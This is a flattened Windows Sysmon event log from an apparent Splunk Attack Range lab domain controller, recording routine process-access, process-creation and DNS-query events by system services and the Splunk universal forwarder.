13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.662{59A5CD1D-8E59-6005-4B00-00000000A301}4064C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.611{59A5CD1D-8E59-6005-4A00-00000000A301}40284032C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.872{59A5CD1D-8E44-6005-0B00-00000000A301}856win-dc-495010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.870{59A5CD1D-8E56-6005-2C00-00000000A301}2588win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.868{59A5CD1D-8E56-6005-2C00-00000000A301}2588localhost0::1;::ffff:127.0.0.1;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.376{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.381{59A5CD1D-8E59-6005-4A00-00000000A301}4028C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.345{59A5CD1D-8E59-6005-4900-00000000A301}39883992C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4900-00000000A301}3988C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 